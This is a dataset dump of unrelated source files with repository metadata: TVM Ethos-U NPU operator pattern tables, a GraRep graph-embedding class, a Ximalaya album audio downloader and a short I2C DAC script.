class ReshapeParams:
    """
    Parses a call to a ethosu.reshape composite function and extracts the
    parameter information.
    """

    composite_name = "ethos-u.reshape"

    def __init__(self, func_body: Call):
        self.new_shape = func_body.attrs.newshape
        self.ifm = TensorParams(func_body.args[0])
        self.ofm = TensorParams(func_body)

    def is_valid(self):
        """
        Check whether reshape has NPU-compatible attributes.
        """
        # Both tensors must be at most rank 4 and int8.
        if not (check_dimensions(self.ifm) and check_dimensions(self.ofm)):
            return False
        return bool(check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]))
def reshape_pattern():
    """Create pattern for reshape"""
    return is_op("reshape")(wildcard())
class StridedSliceParams:
    """
    Parses a call to a ethosu.strided_slice composite function and extracts
    the parameter information.
    """

    composite_name = "ethos-u.strided_slice"

    def __init__(self, func_body: Call):
        self.ifm = TensorParams(func_body.args[0])
        self.ofm = TensorParams(func_body)
        attrs = func_body.attrs
        # Slice start indices
        self.begin = attrs.begin
        # Slice end indices
        self.end = attrs.end
        self.strides = attrs.strides
        self.axes = attrs.axes
        self.slice_mode = attrs.slice_mode

    def is_valid(self):
        """
        Check whether strided_slice has NPU-compatible attributes.
        """
        if not (check_dimensions(self.ifm) and check_dimensions(self.ofm)):
            return False
        if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]):
            return False
        # begin/end must pair up and describe non-negative extents.
        if len(self.begin) != len(self.end):
            return False
        if any(start > stop for start, stop in zip(self.begin, self.end)):
            return False
        # Only strides of 1 are supported
        if self.strides and not all(stride == 1 for stride in self.strides):
            return False
        return True
def strided_slice_pattern():
    """Create pattern for strided_slice"""
    return is_op("strided_slice")(wildcard())
class AbsParams:
    """
    Parses a call to a ethosu.unary_elementwise Abs composite function and
    extracts the parameter information.
    """

    composite_name = "ethos-u.abs"

    def __init__(self, func_body: Call):
        from tvm.relay.backend.contrib.ethosu.util import QuantizeArgs
        from tvm.relay.backend.contrib.ethosu.util import DequantizeArgs

        # The composite is quantize(abs(dequantize(ifm))).
        quantize = func_body
        abs_op = quantize.args[0]
        dequantize = abs_op.args[0]
        layout = "NHWC"
        self.ifm = TensorParams(
            dequantize.args[DequantizeArgs.IFM.value],
            layout,
            dequantize.args[DequantizeArgs.IFM_SCALE.value],
            dequantize.args[DequantizeArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            quantize,
            layout,
            quantize.args[QuantizeArgs.OFM_SCALE.value],
            quantize.args[QuantizeArgs.OFM_ZERO_POINT.value],
        )
        self.operator_type = "ABS"
        self.activation = None

    def is_valid(self):
        """Check whether Abs has NPU-compatible attributes."""
        if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8, np.uint8]):
            return False
        if self.ofm.dtype != self.ifm.dtype:
            return False
        if not check_dimensions(self.ifm):
            return False
        # A batch dimension, when present, must be 1.
        if len(self.ifm.shape) == 4 and self.ifm.shape[0] != 1:
            return False
        if self.ifm.shape != self.ofm.shape:
            return False
        return True
def abs_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """Create pattern for abs"""
    dequantized = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
    absolute = is_op("abs")(dequantized)
    return is_op("qnn.quantize")(absolute, is_constant(), is_constant())
class LutActivationParams:
    """
    Parent class for LUT-based activation functions: extracts the input and
    output tensors and checks whether they are valid.
    """

    def __init__(self, func_body: Call):
        from tvm.relay.backend.contrib.ethosu.util import QuantizeArgs
        from tvm.relay.backend.contrib.ethosu.util import DequantizeArgs

        # The composite is quantize(activation(dequantize(ifm))).
        layout = "NHWC"
        quantize = func_body
        activation = quantize.args[0]
        dequantize = activation.args[0]
        in_var = dequantize.args[0]
        self.ifm = TensorParams(
            in_var,
            layout=layout,
            scale=dequantize.args[DequantizeArgs.IFM_SCALE.value],
            zero_point=dequantize.args[DequantizeArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            quantize,
            layout=layout,
            scale=quantize.args[QuantizeArgs.OFM_SCALE.value],
            zero_point=quantize.args[QuantizeArgs.OFM_ZERO_POINT.value],
        )

    def is_valid(self):
        """
        Check whether the activation has NPU-compatible attributes.
        """
        return bool(check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]))
class TanhParams(LutActivationParams):
    """
    This class will parse a call to a ethos-u.tanh composite function
    and extract the parameter information.
    """
    composite_name = "ethos-u.tanh"
def tanh_pattern():
    """Create pattern for tanh"""
    dequantized = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
    activated = is_op("tanh")(dequantized)
    return is_op("qnn.quantize")(activated, is_constant(), is_constant())
class SigmoidParams(LutActivationParams):
    """
    Parses a call to a ethos-u.sigmoid composite function and extracts the
    parameter information (tensors come from LutActivationParams).
    """

    composite_name = "ethos-u.sigmoid"
def sigmoid_pattern():
    """Create pattern for sigmoid"""
    dequantized = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
    activated = is_op("sigmoid")(dequantized)
    return is_op("qnn.quantize")(activated, is_constant(), is_constant())
class LeakyReLUParams(LutActivationParams):
    """
    Parses a call to a ethos-u.leaky_relu composite function and extracts
    the parameter information.
    """

    composite_name = "ethos-u.leaky_relu"

    def __init__(self, func_body: Call):
        super().__init__(func_body)
        # The alpha attribute lives on the nn.leaky_relu call, which is the
        # argument of the outer qnn.quantize.
        self.alpha = func_body.args[0].attrs.alpha
def leaky_relu_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for leaky relu.
    """
    dequantized = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
    activated = is_op("nn.leaky_relu")(dequantized)
    return is_op("qnn.quantize")(activated, is_constant(), is_constant())
class MeanParams:
    """
    This class will parse a call to ethosu.mean composite function
    and extract the parameter information.
    """
    composite_name = "ethos-u.mean"
    def __init__(self, func_body: Call):
        """Decompose requantize(mean(cast(ifm))) and record tensors,
        reduction axes and the spatial extents of the input."""
        from tvm.relay.backend.contrib.ethosu.util import RequantArgs
        requantize = func_body
        mean_op = requantize.args[0]
        attrs = mean_op.attrs
        cast = mean_op.args[0]
        layout = "NHWC"
        self.ifm = TensorParams(
            cast.args[0],
            layout,
            requantize.args[RequantArgs.IFM_SCALE.value],
            requantize.args[RequantArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            requantize,
            layout,
            requantize.args[RequantArgs.OFM_SCALE.value],
            requantize.args[RequantArgs.OFM_ZERO_POINT.value],
        )
        ifm_shape = self.ifm.shape
        # For rank-2/3 inputs there is no batch dim, so H/W shift down one axis.
        self.height = ifm_shape[0] if len(ifm_shape) in (2, 3) else ifm_shape[1]
        self.width = ifm_shape[1] if len(ifm_shape) in (2, 3) else ifm_shape[2]
        self.keepdims = attrs.keepdims
        self.axis = list(sorted(attrs.axis))
        if attrs.exclude:
            # exclude=True means reduce over every axis NOT listed in attrs.axis.
            self.axis = [i for i in range(len(self.ifm.shape)) if i not in self.axis]
    def is_valid(self) -> bool:
        """
        Checks whether Mean has compatible attributes with HW.
        """
        def check_axis(num_dims, axis):
            # The reduction must be over the spatial axes; their index depends
            # on whether a batch dimension is present (rank 4) or not (rank 2/3).
            if num_dims in (2, 3):
                return axis in ([0], [1], [0, 1])
            return axis in ([1], [2], [1, 2])
        tensor_params = [self.ifm, self.ofm]
        if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
            return False
        if self.ifm.dtype != self.ofm.dtype:
            return False
        if not len(self.ifm.shape) in [2, 3, 4]:
            return False
        if not check_axis(len(self.ifm.shape), self.axis):
            return False
        # MEAN has further restrictions on the input size, depending on legalization method.
        input_size = self.height * self.width
        if input_size > 65536:
            return False
        # Requantizing to a different scale/zero point tightens the size limit.
        if (
            self.ifm.q_params.scale_f32 != self.ofm.q_params.scale_f32
            or self.ifm.q_params.zero_point != self.ofm.q_params.zero_point
        ) and input_size > 4096:
            return False
        if self.axis == [1, 2] and self.keepdims and self.ifm.dtype == "int8" and input_size > 256:
            return False
        # Large kernel height reshape only when axis is [1, 2]
        if self.axis != [1, 2] and self.height > 64:
            return False
        return True
def mean_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    Build the pattern for mean.
    """
    upcast = is_op("cast")(wildcard())
    reduced = is_op("mean")(upcast)
    return is_op("qnn.requantize")(
        reduced, is_constant(), is_constant(), is_constant(), is_constant()
    )
class ConcatParams:
    """
    This class will parse a call to a ethos-u.concat composite function
    and extract the parameter information.
    """
    composite_name = "ethos-u.concat"
    def __init__(self, func_body):
        """Record the concatenated tensors, axis and — for the qnn variant —
        per-input quantization scales and zero points."""
        self.concat = func_body
        # The pattern matches either qnn.concatenate or plain concatenate.
        self.is_qnn_variant = self.concat.op.name == "qnn.concatenate"
        self.input_tensors = [TensorParams(tensor) for tensor in list(func_body.args[0])]
        self.axis = func_body.attrs.axis
        if self.is_qnn_variant:
            self.input_scales = [s.data.asnumpy() for s in list(func_body.args[1])]
            self.input_zero_points = [zp.data.asnumpy() for zp in list(func_body.args[2])]
    def is_valid(self):
        """Checks whether Concatenate has compatible attributes with the hardware"""
        if not check_valid_dtypes(self.input_tensors, supported_dtypes=[np.int8]):
            return False
        # Check that the scales and zero points of input tensors are the same
        # NOTE(review): `list == element` relies on numpy broadcasting the
        # comparison elementwise; all() then reduces the resulting array.
        if self.is_qnn_variant and not all(self.input_scales == self.input_scales[0]):
            return False
        if self.is_qnn_variant and not all(self.input_zero_points == self.input_zero_points[0]):
            return False
        input_dim = len(self.input_tensors[0].shape)
        # Every input must share the first input's rank.
        for tensor in self.input_tensors:
            if len(tensor.shape) != input_dim:
                return False
        # Only an explicit, non-negative, in-range axis is supported.
        if self.axis is None:
            return False
        if self.axis < 0:
            return False
        if self.axis >= input_dim:
            return False
        output_shape = self.concat.checked_type.shape
        if len(output_shape) != input_dim:
            return False
        # With rank > 3 the batch dimension must be 1.
        if len(output_shape) > 3 and output_shape[0] != 1:
            return False
        return True
def concat_pattern():
    """Match either a plain concatenate or a quantized qnn.concatenate."""
    inputs = is_tuple(None)
    plain = is_op("concatenate")(inputs)
    quantized = is_op("qnn.concatenate")(
        inputs, is_tuple(None), is_tuple(None), is_constant(), is_constant()
    )
    return plain | quantized
class SplitParams:
    """
    This class will parse a call to a ethos-u.split composite function
    and extract the parameter information.
    """
    composite_name = "ethos-u.split"
    def __init__(self, func_body):
        self.split = func_body
        self.input = TensorParams(func_body.args[0])
        self.axis = func_body.attrs.axis
        # Normalized into either a list of split indices or a section count.
        self.indices_or_sections = self.convert_indices_or_sections(
            func_body.attrs.indices_or_sections
        )
    def convert_indices_or_sections(self, indices_or_sections):
        # split_v
        if isinstance(indices_or_sections, tvm.ir.container.Array):
            values = [i.value for i in indices_or_sections]
        # split
        else:
            values = indices_or_sections.value
        return values
    def is_valid(self):
        """Checks whether split has compatible attributes with the hardware"""
        if not check_valid_dtypes([self.input], supported_dtypes=[np.int8]):
            return False
        return True
def split_pattern():
    """Match a split operation on any input."""
    return is_op("split")(wildcard())
class RequantizeParams:
    """
    This class will parse a call to ethos-u.requantize composite function
    and extract the parameter information.
    """
    composite_name = "ethos-u.requantize"
    def __init__(self, func_body: Call):
        from tvm.relay.backend.contrib.ethosu.util import RequantArgs
        layout = "NHWC"
        in_var = func_body.args[0]
        requantize = func_body
        # Input tensor with its (scale, zero-point) taken from the
        # requantize call's constant arguments.
        self.ifm = TensorParams(
            in_var,
            layout=layout,
            scale=requantize.args[RequantArgs.IFM_SCALE.value],
            zero_point=requantize.args[RequantArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            requantize,
            layout=layout,
            scale=requantize.args[RequantArgs.OFM_SCALE.value],
            zero_point=requantize.args[RequantArgs.OFM_ZERO_POINT.value],
        )
        attrs = requantize.attrs
        self.out_dtype = attrs.out_dtype
    def is_valid(self) -> bool:
        """
        Checks whether qnn.requantize has compatible attributes with HW.
        """
        tensor_params = [self.ifm, self.ofm]
        if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
            return False
        if not check_dimensions(self.ifm) or not check_dimensions(self.ofm):
            return False
        # Only int8 output (or an unspecified out_dtype) is supported.
        if self.out_dtype and self.out_dtype != "int8":
            return False
        return True
def requantize_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """Match a stand-alone qnn.requantize with constant quantization params."""
    quant_args = [is_constant() for _ in range(4)]
    return is_op("qnn.requantize")(wildcard(), *quant_args)
class Resize2dParams:
    """
    This class will parse a call to ethos-u.resize2d composite function
    and extract the parameter information.
    """
    composite_name = "ethos-u.resize2d"
    def __init__(self, func_body: Call):
        layout = "NHWC"
        resize_2d = func_body
        in_var = func_body.args[0]
        # The bilinear variant matches dequantize -> resize2d -> quantize;
        # unwrap it so resize_2d/in_var refer to the actual resize call and
        # its quantized input.
        if (
            isinstance(resize_2d, tvm.relay.expr.Call)
            and isinstance(resize_2d.op, tvm.ir.Op)
            and resize_2d.op.name == "qnn.quantize"
        ):
            resize_2d = resize_2d.args[0]
            in_var = in_var.args[0].args[0]
        out_var = func_body
        self.ifm = TensorParams(in_var, layout=layout)
        self.ofm = TensorParams(out_var, layout=layout)
        attrs = resize_2d.attrs
        self.size = attrs.size
        self.method = attrs.method
        self.roi = attrs.roi
        self.coordinate_transformation_mode = attrs.coordinate_transformation_mode
        self.rounding_method = attrs.rounding_method
        self.out_dtype = attrs.out_dtype
    def is_valid(self) -> bool:
        """
        Checks whether image.resize2d has compatible attributes with HW.
        """
        def check_compatible_size(mode, method, upscale_size, ifm_size):
            """Checking the provided upscale_size is compatible with the NPU. The NPU only
            supports upsampling when the upsampling size is 2 * input_size, or when there is
            no upsampling to be done, so check that this is the case. In the special case of
            resize_bilinear with align_corners=True, the NPU only supports an upsampling
            size of 2 * input_size - 1."""
            delta = 1 if mode == "align_corners" and method == "linear" else 0
            upscale_size = np.array(upscale_size)
            ifm_size = np.array(ifm_size)
            ifm_upscaled = ifm_size * 2 - delta
            return (ifm_upscaled == upscale_size).all() or (ifm_size == upscale_size).all()
        tensor_params = [self.ifm, self.ofm]
        if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
            return False
        if len(self.ifm.shape) != 4 or len(self.ofm.shape) != 4:
            return False
        # Any non-default region of interest (cropping) is unsupported.
        if list(float(x) for x in self.roi) != [0.0] * 4:
            return False
        if self.method not in ("nearest_neighbor", "linear"):
            return False
        if self.coordinate_transformation_mode not in ("asymmetric", "align_corners"):
            return False
        if not check_compatible_size(
            self.coordinate_transformation_mode,
            self.method,
            self.size,
            self.ifm.shape[1:3],
        ):
            return False
        if self.rounding_method != "":
            return False
        if self.out_dtype and self.out_dtype != "int8":
            return False
        return True
def resize2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
    """
    This function creates the pattern for image.resize2d.
    """
    # Bilinear resize appears as dequantize -> resize2d -> quantize, while
    # nearest-neighbor operates directly on the quantized tensor.
    dequant = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
    resize_2d = is_op("image.resize2d")(dequant).has_attr({"method": "linear"})
    quant = is_op("qnn.quantize")(resize_2d, is_constant(), is_constant())
    return quant | is_op("image.resize2d")(wildcard()).has_attr({"method": "nearest_neighbor"})
class ExpandDimsParams:
    """
    Parses a call to an ethos-u.expand_dims composite function and
    extracts its parameter information.
    """
    composite_name = "ethos-u.expand_dims"
    def __init__(self, func_body):
        self.expand_dims = func_body
        self.input = TensorParams(func_body.args[0])
        self.output = TensorParams(func_body)
    def is_valid(self):
        """Check whether expand_dims is compatible with the hardware."""
        tensors = [self.input, self.output]
        if not all(check_dimensions(t) for t in tensors):
            return False
        return check_valid_dtypes(tensors, supported_dtypes=[np.int8])
def expand_dims_pattern():
    """Match an expand_dims operation on any input."""
    any_input = wildcard()
    return is_op("expand_dims")(any_input)
class SqueezeParams:
    """
    Parses a call to an ethos-u.squeeze composite function and extracts
    its parameter information.
    """
    composite_name = "ethos-u.squeeze"
    def __init__(self, func_body):
        self.squeeze = func_body
        self.input = TensorParams(func_body.args[0])
        self.output = TensorParams(func_body)
    def is_valid(self):
        """Check whether squeeze is compatible with the hardware."""
        # Only the output rank is constrained; the input rank may exceed it.
        if not check_dimensions(self.output):
            return False
        return check_valid_dtypes([self.input, self.output], supported_dtypes=[np.int8])
def squeeze_pattern():
    """Match a squeeze operation on any input."""
    any_input = wildcard()
    return is_op("squeeze")(any_input)
class FullyConnectedParams:
    """
    This class will parse a call to an ethos-u.fully_connected composite
    function and extract the parameter information.
    """
    composite_name = "ethos-u.fully_connected"
    @requires_vela
    def __init__(self, func_body):
        from tvm.relay.backend.contrib.ethosu.util import QDenseArgs  # type: ignore
        from tvm.relay.backend.contrib.ethosu.util import BiasAddArgs
        from tvm.relay.backend.contrib.ethosu.util import RequantArgs
        # Peel the optional clip activation to reach the requantize node.
        self.activation = None
        if str(func_body.op) == "clip":
            self.activation = func_body
            requantize_op = self.activation.args[0]
        else:
            requantize_op = func_body
        # The requantize input is either nn.bias_add(qnn.dense, bias)
        # or qnn.dense directly.
        call = requantize_op.args[0]
        if str(requantize_op.args[0].op) == "nn.bias_add":
            bias_add = call
            qnn_dense = call.args[0]
        else:
            bias_add = None
            qnn_dense = call
        # weights & biases are params as they should be constant
        self.weights = TensorParams(
            qnn_dense.args[QDenseArgs.WEIGHTS.value],
            None,
            qnn_dense.args[QDenseArgs.WEIGHTS_SCALE.value],
            qnn_dense.args[QDenseArgs.WEIGHTS_ZERO_POINT.value],
        )
        self.biases = (
            TensorParams(
                bias_add.args[BiasAddArgs.BIASES.value],
                None,
                requantize_op.args[RequantArgs.IFM_SCALE.value],
                requantize_op.args[RequantArgs.IFM_ZERO_POINT.value],
            )
            if bias_add
            else None
        )
        self.ifm = TensorParams(
            qnn_dense.args[QDenseArgs.IFM.value],
            None,
            qnn_dense.args[QDenseArgs.IFM_SCALE.value],
            qnn_dense.args[QDenseArgs.IFM_ZERO_POINT.value],
        )
        self.ofm = TensorParams(
            func_body,
            None,
            requantize_op.args[RequantArgs.OFM_SCALE.value],
            requantize_op.args[RequantArgs.OFM_ZERO_POINT.value],
        )
    def is_valid(self) -> bool:
        """
        Checks whether Fully Connected has compatible attributes with HW
        """
        def check_weights_fc(weights):
            """Checks whether weight tensor is compatible with HW"""
            weights_limit = 127 * 65536
            # A saturation upper bound check for accumulators
            weights.values = weights.values - weights.q_params.zero_point
            axis = 1
            sum_weights = np.amax(np.sum(np.absolute(weights.values), axis=axis))
            if not sum_weights <= weights_limit:
                return False
            return True
        if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]):
            return False
        if not check_weights_fc(self.weights):
            return False
        if not check_bias(self.biases):
            return False
        if not check_batch_size(self.ifm):
            return False
        # Check input shape
        if not len(self.ifm.shape) == 2:
            return False
        # Check output shape
        if not len(self.ofm.shape) == 2:
            return False
        return True
def qnn_fc_pattern():
    """Create the pattern for fully connected:
    qnn.dense -> optional nn.bias_add -> qnn.requantize -> optional clip."""
    dense = is_op("qnn.dense")(
        wildcard(), is_constant(), is_constant(), is_constant(), is_constant(), is_constant()
    )
    optional_bias_add = is_op("nn.bias_add")(dense, is_constant())
    req = is_op("qnn.requantize")(
        dense | optional_bias_add, is_constant(), is_constant(), is_constant(), is_constant()
    )
    optional_clip = req.optional(is_op("clip"))
    return optional_clip
@register_pattern_table("ethos-u")
def pattern_table() -> List[Tuple[str, tvm.relay.dataflow_pattern.DFPattern, Callable]]:
    """Return the (composite name, pattern, predicate) table consumed by
    MergeComposite to decide which operators can be offloaded to the NPU."""
    return [
        (
            QnnConv2DParams.composite_name,
            qnn_conv2d_pattern(),
            lambda pat: QnnConv2DParams(pat).is_valid(),
        ),
        (
            QnnDepthwiseConv2DParams.composite_name,
            qnn_depthwise_conv2d_pattern(),
            lambda pat: QnnDepthwiseConv2DParams(pat).is_valid(),
        ),
        (
            QnnConv2DTransposeParams.composite_name,
            qnn_conv2d_transpose_pattern(),
            lambda pat: QnnConv2DTransposeParams(pat).is_valid(),
        ),
        (
            FullyConnectedParams.composite_name,
            qnn_fc_pattern(),
            lambda pat: FullyConnectedParams(pat).is_valid(),
        ),
        (
            MaxPool2DParams.composite_name,
            qnn_maxpool2d_pattern(),
            lambda pat: MaxPool2DParams(pat).is_valid(),
        ),
        (
            AvgPool2DParams.composite_name,
            qnn_avgpool2d_pattern(),
            lambda pat: AvgPool2DParams(pat).is_valid(),
        ),
        (
            AddParams.composite_name,
            qnn_add_pattern(),
            lambda pat: AddParams(pat).is_valid(),
        ),
        (
            SubParams.composite_name,
            qnn_subtract_pattern(),
            lambda pat: SubParams(pat).is_valid(),
        ),
        (
            MulParams.composite_name,
            qnn_mul_pattern(),
            lambda pat: MulParams(pat).is_valid(),
        ),
        (
            MinParams.composite_name,
            minimum_pattern(),
            lambda pat: MinParams(pat).is_valid(),
        ),
        (
            MaxParams.composite_name,
            maximum_pattern(),
            lambda pat: MaxParams(pat).is_valid(),
        ),
        (
            ShlParams.composite_name,
            shl_pattern(),
            lambda pat: ShlParams(pat).is_valid(),
        ),
        (
            ReshapeParams.composite_name,
            reshape_pattern(),
            lambda pat: ReshapeParams(pat).is_valid(),
        ),
        (
            StridedSliceParams.composite_name,
            strided_slice_pattern(),
            lambda pat: StridedSliceParams(pat).is_valid(),
        ),
        (
            AbsParams.composite_name,
            abs_pattern(),
            lambda pat: AbsParams(pat).is_valid(),
        ),
        (TanhParams.composite_name, tanh_pattern(), lambda pat: TanhParams(pat).is_valid()),
        (
            MeanParams.composite_name,
            mean_pattern(),
            lambda pat: MeanParams(pat).is_valid(),
        ),
        (
            LeakyReLUParams.composite_name,
            leaky_relu_pattern(),
            lambda pat: LeakyReLUParams(pat).is_valid(),
        ),
        (ConcatParams.composite_name, concat_pattern(), lambda pat: ConcatParams(pat).is_valid()),
        (
            SigmoidParams.composite_name,
            sigmoid_pattern(),
            lambda pat: SigmoidParams(pat).is_valid(),
        ),
        (
            SplitParams.composite_name,
            split_pattern(),
            lambda pat: SplitParams(pat).is_valid(),
        ),
        (
            RequantizeParams.composite_name,
            requantize_pattern(),
            lambda pat: RequantizeParams(pat).is_valid(),
        ),
        (
            Resize2dParams.composite_name,
            resize2d_pattern(),
            lambda pat: Resize2dParams(pat).is_valid(),
        ),
        (
            ExpandDimsParams.composite_name,
            expand_dims_pattern(),
            lambda pat: ExpandDimsParams(pat).is_valid(),
        ),
        (
            SqueezeParams.composite_name,
            squeeze_pattern(),
            lambda pat: SqueezeParams(pat).is_valid(),
        ),
    ]
# pylint: disable=unused-argument
@requires_vela
def partition_for_ethosu(
    mod: tvm.ir.IRModule,
    params: Optional[Dict[str, tvm.runtime.NDArray]] = None,
    mod_name: str = "default",
    **opts,
):
    """This helper function partition the relay graph as produced by the
    relay frontend for a given model into external functions
    to be presented to the codegen.
    Parameters
    ----------
    mod : tvm.ir.IRModule
        The IRModule that gets generated from a relay frontend
    params : Optional[Dict[str, tvm.runtime.NDArray]]
        Constant input parameters.
    mod_name: str, optional
        The module name
    Returns
    -------
    mod : IRModule
        The partitioned IRModule with external global functions
    """
    from tvm.relay.backend.contrib.ethosu import preprocess
    # Bind constant weights so patterns over is_constant() can match them.
    if params:
        mod["main"] = bind_params_by_name(mod["main"], params)
    pattern = relay.op.contrib.get_pattern_table("ethos-u")
    # Standard BYOC pipeline: merge composites, annotate supported regions,
    # merge the regions, then split them out into external functions.
    mod = relay.transform.InferType()(mod)
    mod = relay.transform.MergeComposite(pattern)(mod)
    mod = relay.transform.AnnotateTarget("ethos-u")(mod)
    mod = relay.transform.MergeCompilerRegions()(mod)
    mod = relay.transform.InferType()(mod)
    mod = relay.transform.PartitionGraph(mod_name)(mod)
    mod = relay.transform.InferType()(mod)
    # Backend-specific legalization of the partitioned external I/O.
    mod = preprocess.preprocess_ext_io()(mod)
    return mod
| [
"noreply@github.com"
] | UofT-EcoSystem.noreply@github.com |
4c5149cb2165bdc4a1dae9c327c7e46bc017c69a | 7010168d220138f9042e19575a5d605cd05ad7fc | /finalproject/GraRep.py | c8b603a8a173b3d006b7586f94a3505f2ef874ab | [] | no_license | ztypl/MLexp | 9ff01534d53e7bc03422e9051ed471f797738aea | 52bcb93fdbbfc6448d721f12ee341ddbd12cbdc7 | refs/heads/master | 2020-03-21T03:04:29.974293 | 2018-07-04T09:41:09 | 2018-07-04T09:41:09 | 138,035,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,667 | py | # coding : utf-8
# create by ztypl on 2018/6/12
import numpy as np
import sys
from scipy import sparse
class GraRep:
    """GraRep graph embedding (Cao et al., CIKM 2015).

    For each transition step k = 1..K, factorises the log-shifted k-step
    transition probability matrix with a rank-d SVD and concatenates the
    per-step factors into a single (N, d*K) representation.

    Keyword Args:
        lbd: log-shift parameter (lambda in the paper).
        d:   embedding dimension per transition step.
        k:   maximum transition-matrix power K.
    """
    def __init__(self, **kwargs):
        self.lbd = kwargs['lbd']
        self.d = kwargs['d']
        self.k = kwargs['k']
        self.N = None  # number of nodes; set by embedding()/embedding_sparse()
    def embedding_sparse(self, S):
        """Return the (N, d*k) embedding of adjacency matrix S (sparse path)."""
        S = sparse.csc_matrix(S)
        self.N = S.shape[0]
        # Column-normalise S into the one-step transition matrix A.
        Di = 1. / np.asarray(S.sum(axis=0)).reshape(-1)
        A = sparse.diags(Di) @ S
        Ak = sparse.identity(self.N)
        W = np.empty((self.N, 0))
        for k in range(1, self.k+1):
            Ak = Ak @ A  # k-step transition probabilities
            Gamma_k = Ak.sum(axis=0)
            # X_k = log(A_k * N / (lbd * Gamma_k)) restricted to positive values.
            Xk = Ak.multiply(self.N / self.lbd / Gamma_k)
            Xk.data = np.log(Xk.data)
            Xk.data[Xk.data < 0.0] = 0.0
            # BUG FIX: the original tested `Xk.data == np.nan`, which is always
            # False (NaN != NaN), so NaNs leaked into the SVD. Clear every
            # non-finite entry (NaN and +/-inf) instead.
            Xk.data[~np.isfinite(Xk.data)] = 0.0
            Uk, sk, _ = sparse.linalg.svds(Xk, k=self.d)
            Wk = Uk @ np.diag(np.sqrt(sk))
            W = np.hstack((W, Wk))
            sys.stdout.flush()
        return W
    def embedding(self, S):
        """Dense counterpart of embedding_sparse(); identical semantics."""
        self.N = S.shape[0]
        Di = 1. / np.asarray(S.sum(axis=0)).reshape(-1)
        A = np.diag(Di) @ S
        Ak = np.identity(self.N)
        W = np.empty((self.N, 0))
        for k in range(1, self.k+1):
            Ak = Ak @ A
            Gamma_k = Ak.sum(axis=0)
            Xk = np.log(Ak / Gamma_k) - np.log(self.lbd / self.N)
            Xk[Xk < 0.0] = 0.0
            # BUG FIX: `Xk == np.nan` never matches; clear NaN/inf entries
            # (log of zero probabilities) with isfinite.
            Xk[~np.isfinite(Xk)] = 0.0
            uk, sk, _ = np.linalg.svd(Xk)
            Uk = uk[:, :self.d]
            Sk = sk[:self.d]
            Wk = Uk @ np.diag(np.sqrt(Sk))
            W = np.hstack((W, Wk))
        return W
| [
"ztypl@MyDLVM-Linux.ftbrctscb3cunj22geayv2bsmd.bx.internal.cloudapp.net"
] | ztypl@MyDLVM-Linux.ftbrctscb3cunj22geayv2bsmd.bx.internal.cloudapp.net |
b37967cd5cef86d17445269b33e9211c1d7ab0f3 | 365697540428f1a3c5c2f587939805af97fe5766 | /yp.py | cd1e4fa80d3c10713408134711c9f697bb0b07ec | [] | no_license | enlys/python | 24dcc53d72e593621f8d77474610d8c18c55e0b2 | 2a415423ec6014b2df381c9c1f7ab878f689ef95 | refs/heads/master | 2020-04-07T02:56:08.280275 | 2018-11-17T15:24:52 | 2018-11-17T15:24:52 | 157,995,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | import requests
import json
import re
# Spoof a mobile Chrome user agent so the Ximalaya API answers the request.
headers={"User-Agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Mobile Safari/537.36;"}
# Fetch the first 30 tracks of album 16046207 as JSON.
rr=requests.get("https://www.ximalaya.com/revision/play/album?albumId=16046207&pageNum=1&pageSize=30",headers=headers)
ret=rr.content.decode()
di=json.loads(ret)
lists=di['data']['tracksAudioPlay']
# Download each track's audio stream into <trackName>.m4a.
for i in lists:
    src=i['src']
    name=i['trackName']
    print(src,name)
    with open('{}.m4a'.format(name),'ab') as f:
        music=requests.get(src,headers=headers)
        f.write(music.content) | [
"noreply@github.com"
] | enlys.noreply@github.com |
6e7cabaa37307fe2662486cac498a34a84fa741f | 5388b791b6d2eb56230920a261c655b149b6e40d | /python-pdaadhat/pdaadhat/pdaadhat.py | 4599939f68fd95229f9afd599fe692748c63e482 | [
"MIT"
] | permissive | toschoch/power-daad-breakout-hat | 320ca282c0e247541f52e1525aedd43ea6e46e6f | 14732f532225825dfc93ddba189ae369f450e0d3 | refs/heads/master | 2021-01-09T19:26:30.184235 | 2020-04-13T11:04:48 | 2020-04-13T11:04:48 | 242,430,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | from smbus import SMBus
b = SMBus(1) # 1 indicates /dev/i2c-1
# I2C addresses of the two breakout devices on the bus (only dev 1 is used).
dev_addr1 = 0x10
dev_addr2 = 0x11
# Device register offsets.
general_purpose_register = 0x03
dac_pin_config_register = 0x05
dac_out0_register = 0x10
# set I/O0 of dev 0 to dac output
b.write_word_data(dev_addr1, dac_pin_config_register, 0x0001)
# set I/O0 to 1000/4095 -> 0x3e8
b.write_word_data(dev_addr1, dac_out0_register, 0x83e8)
print("{:x}".format(b.read_word_data(dev_addr1, general_purpose_register)))
| [
"tobias.schoch@vtxmail.ch"
] | tobias.schoch@vtxmail.ch |
